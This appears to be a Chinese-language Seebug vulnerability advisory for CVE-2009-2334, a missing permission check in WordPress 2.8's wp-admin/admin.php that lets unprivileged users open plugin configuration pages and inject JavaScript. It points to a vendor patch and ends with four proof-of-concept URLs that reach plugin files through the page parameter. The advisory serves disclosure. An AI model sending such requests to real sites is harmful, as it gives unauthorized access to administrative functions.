WordPress wp-admin/admin.php模块错误权限检查漏洞

2009-07-10T00:00:00
ID SSV:11788
Type seebug
Reporter Root
Modified 2009-07-10T00:00:00

Description

BUGTRAQ ID: 35584 CVE(CAN) ID: CVE-2009-2334

WordPress是一款免费的论坛Blog系统。

WordPress对使用page参数的插件配置PHP模块缺少权限检查,如果非特权用户在请求中用admin.php替换了options- general.php或plugins.php,就可以非授权查看插件配置页面的内容,或修改某些插件选项并注入JavaScript代码。

WordPress WordPress 2.8 WordPress WordPress MU 2.7.1 WordPress


目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://wordpress.org/

                                        
                                            
                                                http://www.example.com/wp-admin/admin.php?page=/collapsing-archives/options.txt
http://www.example.com/wp-admin/admin.php?page=akismet/readme.txt
http://www.example.com/wp-admin/admin.php?page=related-ways-to-take-action/options.php
http://www.example.com/wp-admin/admin.php?page=wp-security-scan/securityscan.php